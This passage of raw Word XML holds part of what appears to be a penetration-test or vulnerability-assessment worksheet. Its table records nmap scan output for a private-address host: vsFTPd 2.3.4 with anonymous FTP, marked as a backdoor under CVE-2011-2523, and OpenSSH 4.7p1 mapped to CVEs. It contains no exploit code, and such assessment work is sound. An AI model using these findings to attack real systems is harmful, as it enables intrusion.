            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="255C5D81" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="637BE591" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2322E55D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(CVE, EDB-ID, EDB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CC5D3AA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C55E10C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(e.g., domain name, banner information, other.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="6C7FD9D0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20B5374A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6316D371" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DBA93C7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">| ftp-syst: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C4318D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">|   STAT: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76ADDC97" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>| FTP server status:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06F47C21" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|      Connected to 192.168.1.141</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C4AA76C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|      Logged in as ftp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0705C53C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|      TYPE: ASCII</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="036C50F6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|      No session bandwidth limit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D6AAFC0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|      Session timeout in seconds is 300</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E55668" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|      Control connection is plain text</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69309EC8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|      Data connections will be plain text</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0948580B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">|      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vsFTPd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2.3.4 - secure, fast, stable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37665B5D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|_End of status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CCBCF8E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>|_ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="61E67372" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60E7B5CD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34366E10" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2011-2523</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27292791" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2011-0762</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70DFB1A7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50AF348D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="4AA10565" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FD40389" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03988C18" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4328CC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ssh-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hostkey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4180D6CD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   1024 60:0f:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cf:e</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06BD5543" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>_  2048</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="287C9633" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E9AF878" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A3AFA8C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33AA965D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2006-4924,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32574EE5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2023-48795</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A7A6A40" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="254B08E5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
